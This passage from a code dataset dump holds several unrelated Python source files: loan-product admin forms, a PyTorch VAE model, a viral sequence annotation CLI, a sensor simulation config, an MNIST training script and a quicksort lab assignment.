v.Length(max=255)])\n\n processing_fee=TextField( validators=[ v.Length(max=255)])\n total_processing_fees=TextField( validators=[ v.Length(max=255)])\n\n insurance_service_tax=TextField( validators=[ v.Length(max=255)])\n insurance_period=TextField( validators=[ v.Length(max=255)])\n insurance_free=TextField( validators=[ v.Length(max=255)])\n total_insurance_fees=TextField( validators=[ v.Length(max=255)])\n\n group_min=IntegerField( validators=[v.DataRequired()] )\n group_max=IntegerField( validators=[v.DataRequired()] )\n\n # def validate_product_name(form,field):\n #\n # product_name =field.data.strip()\n # cnt = EsthenosOrgProduct.objects.filter(product_name=product_name).count()\n # if cnt:\n # raise ValidationError( \"Hey! This product is already registered with us\")\n\n def validate(self):\n if self.group_min.data <= self.group_max.data:\n return True\n\n def save(self, org, product=None):\n if product:\n prod = product\n else:\n prod=EsthenosOrgProduct(product_name=self.product_name.data)\n prod.loan_amount=float(self.loan_amount.data)\n prod.loan_type = self.loan_type.data\n prod.life_insurance=float(self.life_insurance.data)\n prod.eligible_cycle=int(self.eligible_cycle.data)\n prod.number_installments=int(self.number_installments.data)\n prod.emi=float(self.emi.data)\n prod.service_tax=float(self.service_tax.data)\n prod.insurance_service_tax=float(self.insurance_service_tax.data)\n prod.last_emi=float(self.last_emi.data)\n prod.processing_fee=float(self.processing_fee.data)\n prod.total_processing_fees=float(self.total_processing_fees.data)\n prod.interest_rate=float(self.interest_rate.data)\n prod.insurance_free=float(self.insurance_free.data)\n prod.insurance_period=float(self.insurance_period.data)\n prod.total_insurance_fees=float(self.total_insurance_fees.data)\n prod.emi_repayment=self.emi_repayment.data\n prod.loan_tenure=float(self.loan_tenure.data)\n prod.organisation=org\n prod.group_max=self.group_max.data\n prod.group_min=self.group_min.data\n prod.save()\n return prod\n\n\nclass AddOrgGRTTemplateQuestionsForm( Form):\n question = TextField( validators=[v.Length(max=2048)])\n question_hindi = TextField( validators=[v.Length(max=2048)])\n org_id = TextField( validators=[ v.Length(max=255)])\n\n def save( self):\n ques=EsthenosOrgGRTTemplateQuestion()\n ques.question=self.question.data\n ques.question_regional = self.question_hindi.data\n ques.organisation=EsthenosOrg.objects.get(id=self.org_id.data)\n ques.save()\n return ques\n\n\nclass AddOrgCGT1TemplateQuestionsForm( Form):\n question = TextField( validators=[v.Length(max=2048)])\n question_hindi = TextField( validators=[v.Length(max=2048)])\n org_id = TextField( validators=[ v.Length(max=255)])\n\n def save( self):\n ques=EsthenosOrgCGT1TemplateQuestion()\n ques.question=self.question.data\n ques.question_regional = self.question_hindi.data\n ques.organisation=EsthenosOrg.objects.get(id=self.org_id.data)\n ques.save()\n return ques\n\n\nclass AddOrgCGT2TemplateQuestionsForm( Form):\n question = TextField( validators=[v.Length(max=2048)])\n question_hindi = TextField( validators=[v.Length(max=2048)])\n org_id = TextField( validators=[ v.Length(max=255)])\n\n def save( self):\n ques=EsthenosOrgCGT2TemplateQuestion()\n ques.question=self.question.data\n ques.question_regional = self.question_hindi.data\n ques.organisation=EsthenosOrg.objects.get(id=self.org_id.data)\n ques.save()\n return ques\n\n\nclass AddOrgTeleCallingTemplateQuestionsForm( Form):\n org_id = TextField( validators=[v.DataRequired(), v.Length(max=255)])\n question = TextField( validators=[v.DataRequired(), v.Length(max=2048)])\n question_hindi = TextField( validators=[v.DataRequired(), v.Length(max=2048)])\n\n def save( self):\n ques=EsthenosOrgTeleCallingTemplateQuestion()\n ques.question=self.question.data\n ques.question_regional = self.question_hindi.data\n ques.organisation=EsthenosOrg.objects.get(id=self.org_id.data)\n ques.save()\n return ques\n","sub_path":"e_admin/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":17059,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"466442585","text":"import os\n\n\nDEBUG = True\nPORT = 9192\n\nEXECUTORS = ['python.PythonExecutor', 'spark.SparkExecutor']\nDEFAULT_EXECUTOR = 'spark.SparkExecutor'\n\n# Location of Spark home, where we can find PySpark.\nSPARK_HOME = os.environ.get('SPARK_HOME', '/scratch/spark-1.0.0')\n# Host name of the master node of your Spark cluster.\nSPARK_MASTER = 'local'\n","sub_path":"metis/tests/conf/settings.py","file_name":"settings.py","file_ext":"py","file_size_in_byte":337,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"148203802","text":"import torch as torch\nimport torch.nn as nn\nimport torch.nn.functional as F\n\nimport pdb\n\n\nclass SimpleAttention(nn.Module):\n def __init__(self, hidden_size):\n super(SimpleAttention, self).__init__()\n\n self.W_d = nn.Linear(hidden_size, hidden_size, bias=True)\n\n self.W_e = nn.Linear(hidden_size * 2, hidden_size, bias=True)\n\n self.v = nn.Linear(hidden_size, 1, bias=True)\n\n def forward(self, h_d, h_e, mask):\n batch_size, seq_len, _ = list(h_e.size())\n h_d = h_d.unsqueeze(1)\n\n Wd_hd = self.W_d(h_d.repeat(1, seq_len, 1)) # B x T_e x hidden_size\n We_he = self.W_e(h_e) # B x T_e x hidden_size\n\n e_t = self.v(torch.tanh(Wd_hd + We_he)).squeeze(-1) # B x T_e\n\n # Pad non-token tensors to be -1e10 such that exp(-1e10) = 0\n e_t = e_t.masked_fill(mask == 0, -1e10)\n a_t = torch.softmax(e_t, dim=-1) # B x T_e\n c_t = torch.bmm(a_t.unsqueeze(1), h_e).squeeze(1) # B x 2*hidden_size\n\n return c_t\n\n\nclass VAE(nn.Module):\n def __init__(self, embed_w, embed_size, hidden_size, output_size, dropout_p=0.1):\n super(VAE, self).__init__()\n \"\"\"\n As specified in the paper [https://arxiv.org/pdf/1708.00625.pdf],\n dimension of the latent variable z is equal to the size of hidden units\n \"\"\"\n self.encoded = False\n\n latent_size = hidden_size\n\n self.hidden_size = hidden_size\n self.latent_size = latent_size\n\n self.embedding = nn.Embedding.from_pretrained(embed_w)\n self.dropout = nn.Dropout(dropout_p)\n\n # Encoder\n self.encoder_rnn = nn.GRU(embed_size, hidden_size, num_layers=1, bidirectional=True, batch_first=True)\n self.attention = SimpleAttention(hidden_size)\n\n # Decoder (deterministic)\n self.decoder_rnn1 = nn.GRU(embed_size, hidden_size, num_layers=1, batch_first=True)\n self.decoder_rnn2 = nn.GRU(embed_size + 2 * hidden_size, hidden_size, num_layers=1, batch_first=True)\n\n # VAE Encoder\n self.W_yh_ez = nn.Linear(embed_size, hidden_size)\n self.W_zh_ez = nn.Linear(latent_size, hidden_size)\n self.W_hh_ez = nn.Linear(hidden_size, hidden_size)\n\n self.W_mu = nn.Linear(hidden_size, latent_size)\n self.W_logvar = nn.Linear(hidden_size, latent_size)\n\n # VAE Decoder\n self.W_zh_dy = nn.Linear(latent_size, hidden_size)\n self.W_hh_dy = nn.Linear(hidden_size, hidden_size)\n self.W_hy = nn.Linear(hidden_size, output_size)\n\n def encode(self, x, mask):\n self.mask = mask\n\n x = self.embedding(x) # B x t_k x embedding_size\n x = self.dropout(x)\n\n self.h_e, h_n = self.encoder_rnn(x) # B x t_k x 2*hidden_size\n self.h_e = self.h_e.masked_fill(mask.unsqueeze(-1) == 0, 0)\n\n self.encoded = True\n\n def forward(self, y, h_d1=None, h_d2=None, z=None):\n \"\"\"\n Generate output for the recurrent VAE decoder for a single timestep\n \"\"\"\n if not self.encoded:\n raise Exception(\"Need to first encode input sequence!\")\n\n y = self.embedding(y).squeeze(1) # B x 1 x embed_size\n\n input_len = self.mask.sum(dim=1).unsqueeze(1) # B x 1\n\n # Initialized h_d_0 to be the average of all the encoder input states\n if h_d1 is None or h_d2 is None:\n h_d_0 = torch.add(\n torch.sum(self.h_e[:, :, :self.hidden_size], 1) / input_len,\n torch.sum(self.h_e[:, :, self.hidden_size:], 1) / input_len) / 2.\n\n h_d_0 = h_d_0.detach() # B x hidden_size\n\n h_d1 = h_d_0 if h_d1 is None else h_d1\n h_d2 = h_d_0 if h_d2 is None else h_d2\n\n # Compute the deterministic hidden states of the decoder\n output, h_d1_t = self.decoder_rnn1(y.unsqueeze(1), h_d1.unsqueeze(0)) # 1 x B x hidden_size\n h_d1_t = h_d1_t.squeeze(0) # B x hidden_size\n\n c_t = self.attention(h_d1_t, self.h_e, self.mask)\n output, h_d2_t = self.decoder_rnn2(torch.cat((y, c_t), dim=-1).unsqueeze(1),\n h_d2.unsqueeze(0))\n\n h_d2_t = h_d2_t.squeeze(0) # B x hidden_size\n\n # Compute latent vector z at current time-step using VAE encoder\n\n if z is None:\n h_ez_t = torch.sigmoid(self.W_yh_ez(y) + self.W_hh_ez(h_d1)) # B x hidden_size\n\n # Use latent vector z for VAE hidden state if passed in from previous time-step\n else:\n h_ez_t = torch.sigmoid(self.W_yh_ez(y) + self.W_zh_ez(z) + self.W_hh_ez(h_d1)) # B x hidden_size\n\n mu_t = self.W_mu(h_ez_t) # B x latent_size\n logvar_t = self.W_logvar(h_ez_t) # B x latent_size\n sigma_t = torch.sqrt(torch.exp(logvar_t)) # B x latent_size\n eps = torch.randn(mu_t.size()) # B x latent_size\n\n z_t = mu_t + sigma_t * eps.to(sigma_t.device) # B x latent_size\n\n # Compute output vector y from latent vector z using VAE decoder\n h_dy_t = torch.tanh(self.W_zh_dy(z_t) + self.W_hh_dy(h_d2_t)) # B x hidden_size\n y_t = F.log_softmax(self.W_hy(h_dy_t), -1) # B x output_size\n\n # Compute the KL-Divergence between q(z_t|y, z) and p(z)\n KL = 0.5 * torch.sum(logvar_t.exp() + mu_t.pow(2) - logvar_t - 1, 1)\n\n return y_t, h_d1_t, h_d2_t, z_t, KL\n\n def init_weights(self):\n for m in self.modules():\n if isinstance(m, nn.Linear):\n nn.init.xavier_normal_(m.weight.data)\n nn.init.zeros_(m.bias.data)","sub_path":"models/VAE.py","file_name":"VAE.py","file_ext":"py","file_size_in_byte":5489,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"251361159","text":"#!/usr/bin/env python3\n\nimport argparse\nimport os\nfrom progress.bar import Bar\nimport shutil\nimport subprocess\nimport sys\nimport traceback\n\n\nfrom include.misc import fasta, gff3, string\nfrom include.prrsv_orf5_rflp import prrsv_orf5_rflp\nfrom include.sequence_annotate import sequence_annotate\nfrom include.settings import bash_path, minimal_stderr, is_circular, is_double\nfrom include.species_identify import species_identify \n\n################################################################################\n\nspar_path = os.path.dirname(os.path.realpath(__file__))\nvalid_organism_li = [d for d in os.listdir(spar_path+\"/required/\") if os.path.isdir(spar_path+\"/required/\"+d) and d != \"blastdb\"]\nif bash_path != None:\n os.environ[\"PATH\"] = bash_path\n\n################################################################################\n################################################################################\n \ndef main():\n '''Main method : parse input arguments and run appropriate operation'''\n \n def str2bool(v):\n out = string.convert_bool(v)\n if out == None:\n raise argparse.ArgumentTypeError('Boolean value expected.')\n return(out)\n \n parser = argparse.ArgumentParser()\n subparsers = parser.add_subparsers(dest=\"process\", required=True, help=\"Type of input (rflp or annotate). See specific help for more options based on input type chosen e.g. python run.py rflp --help\")\n \n # annotate\n sp_annotate = subparsers.add_parser(\"annotate\", help=\"\") #!\n sp_annotate.add_argument(\"input\", type=str, help=\"Input FASTA file name\")\n sp_annotate.add_argument(\"--limit\", type=str, help=\"Annotates only genomic features provided in comma delimited list\")\n sp_annotate.add_argument(\"--organism\", type=str, help=\"Possible organism identity of sequences in input FASTA file provided in comma delimited list\")\n sp_annotate.add_argument(\"--output\", type=str, help=\"Output gff3 file name\")\n \n # rflp\n sp_rflp = subparsers.add_parser(\"rflp\", help=\"\") #!\n sp_rflp.add_argument(\"input\", type=str, help=\"Input FASTA file name\")\n sp_rflp.add_argument(\"--full\", type=str2bool, default=True, help=\"Only assign RFLP pattern to input sequences that are complete\")\n sp_rflp.add_argument(\"--output\", type=str, help=\"Output FASTA file name\")\n \n args = parser.parse_args()\n\n# logging.info(\"Input Arguments : %s\", args) #?\n \n read_fasta_li2 = fasta.read(args.input)\n # build random, non-existent directory name\n temp_dir = string.unique_directory(spar_path+\"/temporary/\")\n subprocess.call(\"mkdir -p \"+temp_dir, shell=True)\n \n # variable assignment based on invoked subparser option\n if args.process == \"annotate\":\n input_organism_li, choose_match_li = [], []\n if args.organism != None:\n input_organism_li = args.organism.split(\",\")\n if args.limit != None:\n choose_match_li = args.limit.split(\",\")\n if args.process == \"rflp\":\n input_organism_li, choose_match_li = [\"PRRSV1\", \"PRRSV2\"], [\"ORF5\"]\n \n # Run\n\n # processes input fasta based on provided list of possible organism/s and feature/s\n annotate_li4 = [[] for x in read_fasta_li2[0]]\n input_organism_li = [x for x in input_organism_li if x in valid_organism_li]\n if len(input_organism_li) == 0:\n input_organism_li = valid_organism_li[:]\n # check required bash utilities\n required_program_li = [\"hmmalign\", \"hmmbuild\", \"mafft\", \"awk\"]\n if \"prrsv_orf5_RFLP\" in sys.argv[0] or len(input_organism_li) != 1:\n required_program_li += [\"blastn\", \"makeblastdb\", \"blastdbcmd\"]\n missing_program_li = [x for x in required_program_li if shutil.which(x) == None]\n if len(missing_program_li) > 0:\n print(\"The following dependencies could not be found:\", \", \".join(missing_program_li)+\".\", file=sys.stderr)\n print(\"Please install and rerun.\", file=sys.stderr)\n else:\n if minimal_stderr: # ignore affirmative sequence processing and error traceback\n original_stderr = sys.stderr\n sys.stderr = open(os.devnull, \"w\")\n # check selected organism dependencies\n for organism in input_organism_li:\n if not sequence_annotate.prep.main(organism):\n print(\"Removing \"+organism+\" from searchable organisms.\", file=sys.stderr)\n input_organism_li = [x for x in input_organism_li if x != organism]\n fasta_di, sum_len = {}, len(read_fasta_li2[1])\n if len(input_organism_li) != 1:\n print(\"Identifying species for \"+str(len(read_fasta_li2[1]))+\" sequences\", file=sys.stderr)\n identify = species_identify(temp_dir)\n fasta_di = identify.main(read_fasta_li2, input_organism_li)\n sum_len = sum([len(fasta_di[x]) for x in fasta_di])\n blast_complete_str = \"Species identification complete\"\n if len(read_fasta_li2[1]) > sum_len:\n blast_complete_str += \" (\"+str(len(read_fasta_li2[1])-sum_len)+\" sequences could not be identified)\"\n print(blast_complete_str, file=sys.stderr) \n else:\n fasta_di[input_organism_li[0]] = [[index, sequence] for index, sequence in enumerate(read_fasta_li2[1])]\n print(\"Annotating \"+str(sum_len)+\" sequences...\", file=sys.stderr)\n bar = Bar(\"Progress\", fill='#', suffix='%(percent)d%%', max=sum_len) # track progress with bar visual\n try:\n # annotate by organism\n for organism in fasta_di:\n annotate = sequence_annotate.process(organism, temp_dir)\n choose_match_li = [x for x in choose_match_li if x in annotate.total_cds]\n if choose_match_li == []:\n choose_match_li = annotate.total_cds \n for di_li in fasta_di[organism]: # use original FASTA order\n total_annotate_li2 = annotate.main(di_li[1], choose_match_li)\n if len(total_annotate_li2) > 0:\n annotate_li4[di_li[0]] = [organism, total_annotate_li2]\n bar.next()\n except:\n traceback.print_exc(file=sys.stderr)\n print(read_fasta_li2[0], file=sys.stderr) #?\n bar.finish()\n print(\"Annotation process complete\", file=sys.stderr)\n if minimal_stderr:\n sys.stderr.close()\n sys.stderr = original_stderr\n \n #annotate argument\n if args.process == \"annotate\":\n output_gff3 = gff3.write(read_fasta_li2, annotate_li4, spar_path+\"/required/\")\n if args.output != None:\n write_file = open(args.output, \"w\")\n write_file.write(output_gff3)\n write_file.close()\n else:\n print(output_gff3)\n \n #rflp argument\n if args.process == \"rflp\":\n rflp = prrsv_orf5_rflp(temp_dir)\n print(\"Assigning RFLP patterns to \"+str(len(annotate_li4))+\" sequences...\", file=sys.stderr)\n bar = Bar(\"Progress\", fill='#', suffix='%(percent)d%%', max=len(annotate_li4)) # track progress with bar visual\n for fasta_index, annotate_li3 in enumerate(annotate_li4):\n if len(annotate_li3) > 0 and annotate_li3[0] == \"PRRSV2\":\n read_fasta_li2[0][fasta_index] += \"/\"+rflp.main(read_fasta_li2[1][fasta_index], annotate_li3[1], args.full)\n else:\n read_fasta_li2[0][fasta_index] += \"/na\" # invalid organism\n bar.next()\n bar.finish()\n print(\"RFLP pattern assignment complete\", file=sys.stderr)\n if args.output != None and os.path.isfile(args.output):\n fasta.write(args.output, read_fasta_li2)\n else:\n for fasta_index, head in enumerate(read_fasta_li2[0]):\n print(\">\"+head)\n print(read_fasta_li2[1][fasta_index])\n \n # remove temporary directory\n subprocess.call(\"rm -rf \"+temp_dir, shell=True)\n\n\nif __name__ == \"__main__\":\n main()\n \n \n\n","sub_path":"run.py","file_name":"run.py","file_ext":"py","file_size_in_byte":7974,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"22867527","text":"\n# ISM CONFIGURATION FILE\nimport numpy as np\n\nclass ismConfig:\n\n def __init__(self):\n\n # Configuration parameters\n #--------------------------------------------------------------------------------\n # CCD\n self.pix_size = 30e-6 # [m] Pixel size in microns for the MS channels\n self.t_int = 0.00672 # [s] Integration time\n\n # Optical system\n self.D = 0.150 # [m] Telescope pupil diameter\n self.f = 0.5262 # [m] Focal length\n self.Tr = 0.99 # [-] Optical transmittance\n self.wLF = 100e-9 # [m] RMS of low-frequency wavefront errors\n self.wHF = 100e-9 # [m] RMS of high-frequency wavefront errors\n self.kLF = 180 # [-] Empirical coefficient for the aberrations MTF for low-frequency wavefront errors\n self.kHF = 300 # [-] Empirical coefficient for the aberrations MTF for high-frequency wavefront errors\n self.defocus = 2 # [-] Defocus coefficient (defocus/(f/N)). 0-2 low defocusing\n self.ksmear = 0.191 # [pixels] Coefficient for the smearing ALT\n self.kmotion = 0.02 # [pixels] Amplitude of high-frequency component for the motion smear MTF in ALT and ACT\n self.kernel_half_width = 0.5 # [pixels] Half-width of the kernel\n self.kernel_step = 0.1 # [pixels] Sampling of the kernel\n\n # Central wavelength of the band\n self.wv = np.array([0.49,0.665,0.865,0.945])*1e-6 # [m] Central wavelength\n\n # Photonic Stage\n self.QE = 0.8 # [e-/ph] Quantum efficiency\n self.FWC = 420000 # [ph] Full Well Capacity\n\n # Detection stage\n self.bad_pix = 1.0 # [%] Percentage of bad/dead pixels in the CCD\n self.dead_pix = 0.5 # [%]\n self.bad_pix_red = 0.1 # [-] Reduction in the quantum efficiency of the pixel (over 1)\n self.dead_pix_red = 0.4 # [-]\n self.kprnu = 0.04 # 4% Coefficient by which we multiply the PRNU standard normal distribution\n # Dark signal modelling\n self.kdsnu = 0.2 # 20% Coefficient by which we multiply the DSNU standard normal distribution\n self.T = 300.0 # [K] Temperature of the system\n self.Tref = 238 # [K] Reference temperature\n self.ds_A_coeff = 7.87 # [e-]\n self.ds_B_coeff = 6040 # [K]\n\n # Electronic stage\n self.ADC_gain = 0.56 # [-]\n self.OCF = 5.4e-6 # [V/e-] Output conversion factor\n self.bit_depth = 12 # [-]\n self.min_voltage = 0.0 # [V]\n self.max_voltage = 0.86 # [V]\n\n self.seed = 123456789 # Seed for the random generators\n\n # Auxiliary inputs (relative paths to the root folder)\n #--------------------------------------------------------------------------------\n self.isrffile = 'isrf/ISRF_'\n\n # Flags to save intermediate outputs\n #--------------------------------------------------------------------------------\n self.save_after_isrf = True # optical stage after the ISRF\n self.save_optical_stage = True # optical stage after the MTF\n self.save_after_ph2e = True # detections stage after the photon to electron conversion\n self.save_after_prnu = True # detections stage after the PRNU\n self.save_after_ds = True # detections stage after the Dark Signal\n self.save_detection_stage = True # detections stage after the bad/dead pixels\n self.save_vcu_stage = True # Video Conversion Unit stage\n\n # Flags to enable or disable the application of noises and effects\n #--------------------------------------------------------------------------------\n # Optical stage. Use the PSF convolution. If False, will use the MTF\n self.do_psf_conv = False\n # Detection stage errors and effects\n self.apply_prnu = True\n self.apply_dark_signal = True\n self.apply_bad_dead = True\n","sub_path":"config/ismConfig.py","file_name":"ismConfig.py","file_ext":"py","file_size_in_byte":4564,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"625487327","text":"import gzip\nimport numpy\nimport ModularNetwork\nimport matplotlib.pyplot as plt\nimport time\nimport random\nimport pickle\n\nf = gzip.open(\"../resources/\" + \"mnist.pkl.gz\", \"rb\")\ntrainingData, testData, validationData = pickle.load(f)\nf.close()\n\n\ndef toVect(i):\n e = numpy.zeros((10, 1))\n e[i] = 1.0\n return e\n\n\ntrainingData = [data for data in\n zip([numpy.reshape(x, (784, 1)) for x in trainingData[0]], [toVect(y) for y in trainingData[1]])]\ntestData = [data for data in\n zip([numpy.reshape(x, (784, 1)) for x in testData[0]], [toVect(y) for y in testData[1]])]\nvalidationData = [data for data in zip([numpy.reshape(x, (784, 1)) for x in validationData[0]],\n [toVect(y) for y in validationData[1]])]\nrandom.shuffle(trainingData)\n\ninputSize = len(trainingData[0][0])\noutputSize = len(trainingData[0][1])\n\nshape = [inputSize, 100, 100, 100, outputSize]\nprint(shape)\nn = ModularNetwork.ModularNetwork(shape)\nepochs = 30\nminiBatchSize = 10\nalpha = 0.25\neta = 5.0\n\ntS = time.time()\ntrainingCost, trainingAccuracy, testCost, testAccuracy = n.learn(trainingData[:int(len(trainingData)/10)], epochs,\n miniBatchSize, alpha, eta, validationData)\ntE = time.time()\nprint(\"Learning phase took \" + str(tE - tS) + \"s with \" + str(epochs) + \" epochs, batch size = \" + str(\n miniBatchSize) + \", alpha = \" + str(alpha) + \", eta = \" + str(eta) + \".\\n\")\n\nplt.figure()\nplt.plot(testAccuracy)\nplt.plot(trainingAccuracy)\nplt.legend()\nplt.show()\n","sub_path":"Code/AVeryModularNetwork/src/MNISTMain.py","file_name":"MNISTMain.py","file_ext":"py","file_size_in_byte":1559,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"547619776","text":"import argparse\nimport traceback\n\nfrom server import request\n\nparser = argparse.ArgumentParser(description=\"Launch server tests\")\nparser.add_argument(\"n_tests\", metavar=\"N\", type=int, nargs=1,\n help=\"the number of tests to run\")\n\nargs = parser.parse_args()\nn_tests = args.n_tests[0]\nsuccess = 0\nfailed = 0\nfor i in range(n_tests):\n out, e = request.request()\n if out == 0:\n print(f\" Test {i + 1}/{n_tests} : OK\")\n success += 1\n else:\n print(f\" Test {i + 1}/{n_tests} : failed with error : {e}\")\n failed += 1\nrate = \"{:0.2f}%\".format((success / n_tests) * 100)\nprint(f\"Testing finished with {success} sucess and {failed} failures,\"\n f\" success rate = {rate}\")\n","sub_path":"test/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":720,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"376764704","text":"'''\nRicky Cheah\nFeb 14, 2020\n\nThis program modifies the quicksort function so that it calls insertionsort \nto sort any sublist whose size is less than a specific threshold of items. \n\nA table with rows of different threshold number and columns of different list\nsizes is generated to show their relationship. \n\nAll quicksort and insertionsort codes are orignally by Ken Lambert.\n'''\n\n\nfrom profiler import Profiler\nimport random #to generate numbers in list\n\ndef insertionSort(lyst, left, right, profiler):\n '''\n Code for insertion sort.\n Takes in an entire list (lyst), \n but only sorts items between \"left\" and \"right\" index. \n profiler object helps to keep a count of different operations and time. \n '''\n i = left + 1\n while i < right + 1:\n exchanged = False #to keep better count of exchanges\n itemToInsert = lyst[i]\n j = i - 1\n while j >= 0: \n profiler.comparison()\n if itemToInsert < lyst[j]:\n lyst[j + 1] = lyst[j]\n profiler.exchange()\n j -= 1\n exchanged = True\n else:\n break\n lyst[j + 1] = itemToInsert\n if exchanged:\n profiler.exchange() #only increase if we actually did exchange\n i += 1\n\ndef quicksort(lyst, mod, threshold, profiler):\n '''\n The main quicksort program, takes in the initial full list (lyst) for sorting.\n Calls the quicksortHelper function to start sorting. \n mod: if True, runs quicksort below a certain list length.\n threshold: list length to use quicksort. \n '''\n quicksortHelper(lyst, 0, len(lyst) - 1, mod, threshold, profiler)\n\ndef quicksortHelper(lyst, left, right, mod, threshold, profiler):\n '''\n Passes the list to the partition function, and split using pivotLocation. \n left: start index of partial list\n right: end index of partial list.\n mod: if True, runs quicksort below a certain list length.\n threshold: list length to use quicksort. \n '''\n if left < right:\n if mod and right - left < threshold: #check if need to use insertionsort\n insertionSort(lyst, left, right, profiler)\n \n else: #continue with quicksort\n pivotLocation = partition(lyst, left, right, profiler)\n quicksortHelper(lyst, left, pivotLocation - 1, mod, threshold, profiler)\n quicksortHelper(lyst, pivotLocation + 1, right, mod, threshold, profiler)\n\ndef partition(lyst, left, right, profiler):\n '''\n Takes in a list partially sorts between \"left\" and \"right\" index. \n Determines the pivot, and moves items smaller than pivot to the left side.\n Returns the boundary location for further splitting. \n '''\n # Find the pivot and exchange it with the last item\n middle = (left + right) // 2\n profiler.exchange()\n pivot = lyst[middle]\n lyst[middle] = lyst[right]\n lyst[right] = pivot\n # Set boundary point to first position\n boundary = left\n # Move items less than pivot to the left, move boundary if swapped\n for index in range(left, right):\n profiler.comparison()\n if lyst[index] < pivot:\n swap(lyst, index, boundary)\n profiler.exchange()\n boundary += 1\n # Exchange the pivot item and the boundary item\n swap (lyst, right, boundary)\n profiler.exchange()\n return boundary\n\ndef swap(lyst, i, j):\n \"\"\"\n Exchanges the items at positions i and j.\n \"\"\"\n # You could say lyst[i], lyst[j] = lyst[j], lyst[i]\n # but the following code shows what is really going on\n temp = lyst[i]\n lyst[i] = lyst[j]\n lyst[j] = temp\n\n\ndef main():\n '''\n Shows the time difference and numbers of comparisons & exchanges \n for original quicksort and modified quicksort \n '''\n p = Profiler()\n #this sample list is taken from Lab2's example\n lyst1 = [18, 9, 31, 23, 8, 34, 43, 34, 33, 33, 17, 19, 51, 14, 3, 16, 31, 21, 48, 44, 29, 24, 13, 26, 31, 18, 37, 11, 48, 27, 26, 38, 7, 40, 24, 45, 29, 11, 46, 48, 8, 21, 15, 43, 7, 42, 47, 17, 44, 51]\n #the list is copied to ensure the test results are comparable. \n lyst2 = lyst1[:]\n\n\n# UNCOMMENT print statements to view lists before and after sorting.\n# print(lyst1, \"\\n\")\n print(p.test(quicksort, lyst1, comp = True, exch = True, mod = False))\n# print(\"Sorted:\\n\", lyst1, \"\\n\")\n \n# print(lyst2, \"\\n\")\n print(p.test(quicksort, lyst2, comp = True, exch = True, threshold = 10, mod = True))\n# print(\"Sorted:\\n\", lyst2, \"\\n\")\n\n print(\"After sorting, List 1 == List 2:\", lyst1 == lyst2)\n print(\"_\"*80)\n \n #this portion generates a list with randomized numbers\n size = 5000\n lyst = []\n for count in range(size):\n lyst.append(random.randint(1, size + 1))\n lyst1 = lyst[:]\n lyst2 = lyst[:]\n print(p.test(quicksort, lyst1, comp = True, exch = True, mod = False))\n print(p.test(quicksort, lyst2, comp = True, exch = True, threshold = 10, mod = True))\n \n print(\"After sorting, List 1 == List 2:\", lyst1 == lyst2)\n print(\"_\"*80)\n findBestCase()\n\ndef findBestCase():\n '''\n Function to compile a table of the time used for sorting for:\n different list sizes and threshold values.\n '''\n p = Profiler()\n masterList = [] #list to contain the lists of different sizes\n resultNoMod = []\n \n print(\" \"*2, end = \"\")\n for exponent in range(1,5): #this creates the master list using random numbers for different list sizes\n size = 5*10**exponent\n \n lyst = []\n for count in range(size):\n lyst.append(random.randint(1, size + 1))\n masterList.append(lyst)\n print(f\"{size:<13}\", end = \"\") #this prints the table headers (list size)\n print()\n \n #this creates the results for non-modified quicksort\n for i in range(0, len(masterList)): \n tempLyst = masterList[i][:] #create list so we don't change the master list\n resultNoMod.append(repr(p.test(quicksort, tempLyst, mod = False)))\n print(resultNoMod, \"Not Modified\")\n \n\n #this creates the results for non-modified quicksort, with different thresholds\n for multiplier in range (1,5):\n resultMod = []\n thresholdValue = multiplier * 10\n for i in range(0, len(masterList)): \n tempLyst = masterList[i][:] #create list so we don't change the master list\n resultMod.append(repr(p.test(quicksort, tempLyst, threshold = thresholdValue, mod = True)))\n print(resultMod, \"Threshold =\", thresholdValue) #prints threshold\n \nif __name__ == \"__main__\":\n main() \n\n\n'''\n1. The performance of modified quicksort is very dependent on the threshold:\n from the graph generated we see that a threshold of around 10 is optimum. \n \n2. The size of the list doesn't affect the modification; it performs better\n than the original quicksort each time (when threshold is 10).\n This improvement is noticeable with larger list sizes (>5000).\n \n3. Insertionsort should be used instead of quicksort when the list \n is \"small enough\", around 10 items as seen from the table. \n \n4. The difference is small; the modified version performs a little\n more comparions, but a little less exchanges. \n\n For example, in a random list of 5000 items, the modified \n quicksort did around 75000 comparisons and 41000 exchanges, \n compared to the original versions 74000 and 41600. \n \n'''","sub_path":"csc242/Lab2_Cheah/Lab2_Cheah.py","file_name":"Lab2_Cheah.py","file_ext":"py","file_size_in_byte":7445,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"404293304","text":"import asyncio\n\n\nbot = None\n\n\nclass TypingContext:\n def __init__(self, channel, delay_between=5, loop=None):\n if not bot:\n raise RuntimeError('Bot not yet initialised when'\n ' TypingContext created')\n\n self.channel = channel\n self.delay_between = delay_between\n self.loop = loop or asyncio.get_event_loop()\n self.typing = False\n\n def __enter__(self):\n self.typing = True\n self.loop.create_task(self.send_typing())\n return self\n\n def __exit__(self, exc_type, exc_val, exc_tb):\n self.typing = False\n\n async def send_typing(self):\n while self.typing:\n await asyncio.gather(\n bot.send_typing(self.channel),\n asyncio.sleep(self.delay_between, loop=self.loop)\n )\n","sub_path":"src/levbot/typing_context.py","file_name":"typing_context.py","file_ext":"py","file_size_in_byte":832,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"155008773","text":"from subject_page import *\r\nfrom cn.edustar.jitar.pojos import Placard\r\n\r\nclass placard_add(BaseSubject):\r\n def __init__(self):\r\n BaseSubject.__init__(self)\r\n self.placard = None\r\n self.placradService = __spring__.getBean(\"placardService\")\r\n \r\n def execute(self):\r\n if self.loginUser == None:\r\n return self.LOGIN\r\n \r\n if self.isAdmin() == False:\r\n 